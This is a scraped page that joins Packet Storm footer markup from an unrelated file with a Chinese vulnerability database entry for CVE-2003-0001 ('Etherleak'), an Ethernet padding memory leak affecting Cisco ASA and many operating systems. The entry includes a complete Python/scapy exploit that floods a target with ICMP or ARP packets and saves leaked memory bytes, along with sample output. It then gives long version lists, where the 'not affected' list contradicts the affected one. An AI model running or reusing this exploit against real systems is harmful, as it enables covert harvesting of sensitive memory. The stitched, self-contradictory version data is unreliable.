      <dd><a href="/files/tags/">File Tags</a></dd>
      <dd><a href="/files/directory/">File Directory</a></dd>
    </dl>    
    </div>

    <div class="f-box">
    <dl>
      <dt>About Us</dt>
      <dd><a href="/about/">History & Purpose</a></dd>
      <dd><a href="/contact/">Contact Information</a></dd>
      <dd><a href="/legal/tos.html">Terms of Service</a></dd>
      <dd><a href="/legal/privacy.html">Privacy Statement</a></dd>
      <dd><a href="/legal/copyright.html">Copyright Information</a></dd>
    </dl>
    </div>

    <div class="f-box">
	<dl>
      <dt>Services</dt>
      <dd><a href="/services/">Security Services</a></dd>
      <dt style="margin-top:1.5em;">Hosting By</dt>
      <dd><a href="http://www.rokabear.com/">Rokabear</a></dd>
      <dd><a href="/mirrors/">Global Mirror List</a></dd>
    </dl>   
    </div>
    <div class="f-box">
    <ul class="f-follow">
     <li><a href="https://twitter.com/packet_storm"><img width="24" height="24" alt="Follow on Twitter" src="http://packetstatic.com/img1353978071/s_twitter.png" /> Follow us on Twitter</a></li>
     <li><a href="https://www.facebook.com/packetstormfeed"><img width="24" height="24" alt="Follow on Facebook" src="http://packetstatic.com/img1353978071/s_facebook.png" /> Follow us on Facebook</a></li>
     <li><a href="/feeds"><img width="24" height="24" alt="View RSS Feeds" src="http://packetstatic.com/img1353978071/s_rss.png" /> Subscribe to an RSS Feed</a></li>
    </ul>
    </div>

  </div>
</div>

<div id="o-box"><img src="http://packetstatic.com/img1353978071/o_close.png" alt="close" height="30" width="30" id="o-close" /><div id="o-main"></div></div>


<script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-18885198-1']); _gaq.push(['_setDomainName', '.packetstormsecurity.com']); _gaq.push(['_trackPageview']); (function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})(); </script><noscript><img src="http://www.google-analytics.com/__utm.gif?utmwv=1.3&utmn=1182687020&utmcs=ISO-8859-1&utmsr=31337x31337&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmcn=1&utmdt=RHSA-2003%3A025-20.txt%u2248%20Packet%20Storm&utmhn=packetstormsecurity.com&utmr=-&utmp=%2Ffiles%2F30783%2F&utmac=UA-18885198-1&utmcc=__utma%3D32867617.1182687020.1366884938.1366884938.1366884938.1%3B%2B__utmz%3D32867617.1366884938.1.1.utmccn%3D(direct)%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)" width="2" height="2" alt="" /></noscript>
<!-- Thu, 25 Apr 2013 10:15:36 GMT -->
</body>
</html>
    

- 漏洞信息 (F121969)

Cisco ASA Ethernet Information Leak (PacketStormID:F121969)
2013-06-10 00:00:00
prdelka  
exploit
cisco
CVE-2003-0001
[点击下载]

This is the Cisco ASA ethernet information leak exploit that leverages the vulnerability noted in CVE-2003-0001. Versions prior to 8.4.4.6 and 8.2.5.32 are affected.

#!/usr/bin/env python
# CVE-2003-0001 'Etherleak' exploit
# =================================
# Exploit for hosts which use a network device driver that pads
# ethernet frames with data which vary from one packet to another,
# likely taken from kernel memory, system memory allocated to
# the device driver, or a hardware buffer on its network interface
# card. Exploit uses scapy with either ICMP or ARP requests as
# this can trigger with either but ICMP can hit layer3 filtering
# rules. Using ARP the padding appears to leak only fixed constant
# values when exploited, ICMP leaks random bytes.
#
# root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky
# WARNING: No route found for IPv6 destination :: (no default route?)
# [ CVE-2003-0001 'Etherleak' exploit
# [ Attacking x.x.x.254 for icmp padding saved to leaky.hex
# ............................................................^C!Killing
# !Killing
# root@bt:~/0d# hexdump -C leaky | head
# 00000000  e6 bd a6 9b 90 eb 44 f5  18 a5 29 2a 16 5a 08 ff  |......D...)*.Z..|
# 00000010  43 e1 23 07 8f 96 5a 24  3f 3d 33 7d b4 97 7e 18  |C.#...Z$?=3}..~.|
# 00000020  05 c9 7c 2c a5 c0 fa 7a  76 f3 51 c0 fe 07 72 32  |..|,...zv.Q...r2|
# 00000030  9e ad 6a 67 ad 43 58 17  60 43 bc 2b b8 fb cc 70  |..jg.CX.`C.+...p|
# 00000040  99 92 80 84 03 03 6f 8f  18 d3 5b 5e f0 1e 3a 83  |......o...[^..:.|
# 00000050  3d 82 e7 cd 3e 1f 31 74  b0 06 8c a2 7e 14 6b fb  |=...>.1t....~.k.|
# 00000060  72 9b ac 64 74 9b a4 d9  23 5b 92 82 0d 0b 31 f0  |r..dt...#[....1.|
# 00000070  a9 4f dd 3f bf 2b 5c 67  6c 22 fa da d0 2b d6 39  |.O.?.+\gl"...+.9|
# 00000080  40 58 13 4f 3d bb 48 03  d3 53 3c 5c 44 d2 3d b2  |@X.O=.H..S<\D.=.|
# 00000090  4f f2 a9 4a 02 80 4e 1b  6c bd 69 89 bd 76 1b 0a  |O..J..N.l.i..v..|
#
# This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference
# is CSCua88376 and PSIRT-0669464365.
#
#  -- prdelka
#
import os
import sys
import signal
import binascii
from scapy.all import *
 
def signalhandler(signal,id):
    print "!Killing"
    sys.exit(0)
 
def spawn(host,type):
    if type == 'arp':
        send(ARP(pdst=host),loop=1,nofilter=1)
    elif type == 'icmp':
        send(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1)      
 
if __name__ == "__main__":
    print "[ CVE-2003-0001 'Etherleak' exploit"
    signal.signal(signal.SIGINT,signalhandler)
    if len(sys.argv) < 4:
        print "[ No! Use with <host> <arp|icmp> <file>"
        sys.exit(1)
    type = sys.argv[2]
    if type == 'arp':
        pass
    elif type == 'icmp':
        pass
    else:
        print "Bad type!"
        sys.exit(0)
    pid = os.fork()
    if(pid):
        print "[ Attacking %s for %s padding saved to %s.hex" % (sys.argv[1],sys.argv[2],sys.argv[3])
        spawn(sys.argv[1],sys.argv[2])
    while True:
        if type == 'arp':
            myfilter = "host %s and arp" % sys.argv[1]
        elif type == 'icmp':
            myfilter = "host %s and icmp" % sys.argv[1]
        x = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding))
        p = x[0]
        if type == 'arp':
            pad = p.getlayer(2)
        if type == 'icmp':
            pad = p.getlayer(4)
        leak =  str(pad)
        hexfull = binascii.b2a_hex(leak)
        file = "%s.hex"%sys.argv[3]
        fdesc = open(file,"a")
        fdesc.write(hexfull + "\n")
        fdesc.close()
        # 32 bits leaked here for me.
        if type == 'icmp':
            bytes = leak[9:13]
        elif type == 'arp':
            bytes = leak[10:14]
        fdesc = open(sys.argv[3],"ab")
        fdesc.write(bytes)
        fdesc.close()


    

- 漏洞信息

3873
Multiple Ethernet Driver Frame Padding Information Disclosure
Authentication Management, Information Disclosure
Loss of Confidentiality, Loss of Integrity

- 漏洞描述

Multiple Ethernet Network Interface Card (NIC) Device Drivers contain flaws that may result in an information leakage vulnerability. The issue is triggered when Ethernet device drivers reuse old frame buffer data to pad packets. It is possible that the flaw may allow that may allow remote attackers to harvest sensitive information from affected devices resulting in a loss of confidentiality.

- 时间线

2004-02-09 Unknow
Unknow Unknow

- 解决方案

Contact vendor for upgrade to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor Network Device Driver Frame Padding Information Disclosure Vulnerability
Design Error 6535
Yes No
2003-01-06 12:00:00 2007-03-23 07:33:00
Discovery of this vulnerability credited to Ofir Arkin <ofir@sys-security.com> and Josh Anderson <josh@sys-security.com>.

- 受影响的程序版本

ZyXEL ZyNOS V3.40(ES.5)
+ ZyXEL Prestige 650R-11
Sun Solaris 9
Sun Solaris 8_sparc
Sun Solaris 7.0
Sun Solaris 2.6
NetBSD NetBSD 1.6
NetBSD NetBSD 1.5.3
NetBSD NetBSD 1.5.2
NetBSD NetBSD 1.5.1
NetBSD NetBSD 1.5
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
+ Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Datacenter Server SP1
+ Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Mandriva Linux Mandrake 9.1 ppc
Mandriva Linux Mandrake 9.1
Mandriva Linux Mandrake 9.0
Mandriva Linux Mandrake 8.2 ppc
Mandriva Linux Mandrake 8.2
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Corporate Server 2.1
Linux kernel 2.4.21 pre4
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
Linux kernel 2.4.20
Linux kernel 2.4.19
+ Conectiva Linux 8.0
+ Conectiva Linux Enterprise Edition 1.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
+ S.u.S.E. Linux 8.1
+ Slackware Linux -current
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
Linux kernel 2.4.18 x86
Linux kernel 2.4.18
+ Astaro Security Linux 2.0 23
+ Astaro Security Linux 2.0 16
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Linux 8.0
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Firewall on CD
+ S.u.S.E. Linux Office Server
+ S.u.S.E. Linux Openexchange Server
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. SuSE eMail Server 3.1
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
Linux kernel 2.4.17
Linux kernel 2.4.16
+ Sun Cobalt RaQ 550
Linux kernel 2.4.15
Linux kernel 2.4.14
Linux kernel 2.4.13
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
Linux kernel 2.4.12
+ Conectiva Linux 7.0
Linux kernel 2.4.11
Linux kernel 2.4.10
Linux kernel 2.4.9
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Linux kernel 2.4.8
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
Linux kernel 2.4.6
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.3
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.2
Linux kernel 2.4.1
Linux kernel 2.2.19
+ EnGarde Secure Linux 1.0.1
+ Immunix Immunix OS 7+
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3
+ Trustix Secure Linux 1.5
Linux kernel 2.2.18
+ Caldera OpenLinux 2.4
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ Mandriva Linux Mandrake 7.0
+ Mandriva Linux Mandrake 6.1
+ Mandriva Linux Mandrake 6.0
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ RedHat Linux 6.1 sparc
+ RedHat Linux 6.1 i386
+ RedHat Linux 6.1 alpha
+ RedHat Linux 6.0 sparc
+ RedHat Linux 6.0 alpha
+ RedHat Linux 6.0
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3 ppc
+ S.u.S.E. Linux 6.3 alpha
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.1 alpha
+ S.u.S.E. Linux 6.1
+ S.u.S.E. Linux 6.0
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ Slackware Linux 7.1
+ Slackware Linux 7.0
+ Slackware Linux 4.0
+ Wirex Immunix OS 7.0 -Beta
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 6.2
Linux kernel 2.2.17
+ Mandriva Linux Mandrake 7.2
+ S.u.S.E. Linux 7.0
+ Trustix Secure Linux 1.2
Linux kernel 2.2.16
Linux kernel 2.2.15
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 7.1
Linux kernel 2.2.14
+ Red Hat Linux 6.2
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ Sun Cobalt RaQ 4
Linux kernel 2.0.39
Linux kernel 2.0.38
Linux kernel 2.0.37
Linux kernel 2.0.36
Linux kernel 2.0.35
Linux kernel 2.0.34
Linux kernel 2.0.33
Linux kernel 2.0.32
Linux kernel 2.0.31
Linux kernel 2.0.30
Linux kernel 2.0.29
Linux kernel 2.0.28
Linux kernel 2.0.27
Linux kernel 2.0.26
Linux kernel 2.0.25
Linux kernel 2.0.24
Linux kernel 2.0.23
Linux kernel 2.0.22
Linux kernel 2.0.21
Linux kernel 2.0.20
Linux kernel 2.0.19
Linux kernel 2.0.18
Linux kernel 2.0.17
Linux kernel 2.0.16
Linux kernel 2.0.15
Linux kernel 2.0.14
Linux kernel 2.0.13
Linux kernel 2.0.12
Linux kernel 2.0.11
Linux kernel 2.0.10
Linux kernel 2.0.9
Linux kernel 2.0.8
Linux kernel 2.0.7
Linux kernel 2.0.6
Linux kernel 2.0.5
Linux kernel 2.0.4
Linux kernel 2.0.3
Linux kernel 2.0.2
Linux kernel 2.0.1
Linux kernel 2.0
Leif M. Wright simplestmail.cgi 2.0.22
HP JetDirect J6035A
HP HP-UX (VVOS) 11.0 4
HP HP-UX 11.0
HP HP-UX 10.20 Series 800
HP HP-UX 10.20 Series 700
HP HP-UX 10.20
FreeBSD FreeBSD 4.7
FreeBSD FreeBSD 4.6
FreeBSD FreeBSD 4.5
FreeBSD FreeBSD 4.4
FreeBSD FreeBSD 4.3
FreeBSD FreeBSD 4.2
SGI IRIX 6.5.20
SGI IRIX 6.5.19 m
SGI IRIX 6.5.19 f
SGI IRIX 6.5.19
SGI IRIX 6.5.18 m
SGI IRIX 6.5.18 f
SGI IRIX 6.5.18
SGI IRIX 6.5.17 m
SGI IRIX 6.5.17 f
SGI IRIX 6.5.17
SGI IRIX 6.5.16 m
SGI IRIX 6.5.16 f
SGI IRIX 6.5.16
SGI IRIX 6.5.15 m
SGI IRIX 6.5.15 f
SGI IRIX 6.5.15
SGI IRIX 6.5.14 m
SGI IRIX 6.5.14 f
SGI IRIX 6.5.14
IBM AIX 4.3.3
IBM AIX 4.3.2
IBM AIX 4.3.1
IBM AIX 4.3
IBM AIX 4.2.1
IBM AIX 4.2
IBM AIX 4.1
IBM AIX 4.0
IBM AIX 5.1
Clavister Firewall 8.0
Cisco PIX Firewall 515

- 不受影响的程序版本

SGI IRIX 6.5.20
SGI IRIX 6.5.19 m
SGI IRIX 6.5.19 f
SGI IRIX 6.5.19
SGI IRIX 6.5.18 m
SGI IRIX 6.5.18 f
SGI IRIX 6.5.18
SGI IRIX 6.5.17 m
SGI IRIX 6.5.17 f
SGI IRIX 6.5.17
SGI IRIX 6.5.16 m
SGI IRIX 6.5.16 f
SGI IRIX 6.5.16
SGI IRIX 6.5.15 m
SGI IRIX 6.5.15 f
SGI IRIX 6.5.15
SGI IRIX 6.5.14 m
SGI IRIX 6.5.14 f
SGI IRIX 6.5.14
IBM AIX 4.3.3
IBM AIX 4.3.2
IBM AIX 4.3.1
IBM AIX 4.3
IBM AIX 4.2.1
IBM AIX 4.2
IBM AIX 4.1
IBM AIX 4.0
IBM AIX 5.1
Clavister Firewall 8.0
Cisco PIX Firewall 515

- 漏洞讨论

Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers.

Frames that are smaller than the minimum frame size should have the unused portion of the frame buffer padded with null (or other) bytes. Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact. Consequently, this data may be transmitted within frames across Ethernet segments. Since the Ethernet frame buffer is allocated in kernel memory space, sensitive data may be leaked.

Cisco has stated that the IOS 12.1 and 12.2 trains are not affected.

National Semiconductor Ethernet controller chips are not vulnerable to this issue.

- 漏洞利用

A sample exploit has been provided:

- 解决方案

Please see the referenced advisories for information on obtaining and applying fixes.


Sun Solaris 8_sparc

Sun Solaris 2.6

Sun Solaris 7.0

Sun Solaris 9

HP HP-UX 10.20

HP HP-UX 10.20 Series 800

HP HP-UX 10.20 Series 700

HP HP-UX 11.0

HP HP-UX (VVOS) 11.0 4

MandrakeSoft Multi Network Firewall 2.0

MandrakeSoft Corporate Server 2.1

Linux kernel 2.2.14

Linux kernel 2.2.17

Linux kernel 2.2.19

Linux kernel 2.4.17

Linux kernel 2.4.18

Linux kernel 2.4.21 pre4

Mandriva Linux Mandrake 8.2

Mandriva Linux Mandrake 8.2 ppc

Mandriva Linux Mandrake 9.1 ppc

Mandriva Linux Mandrake 9.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站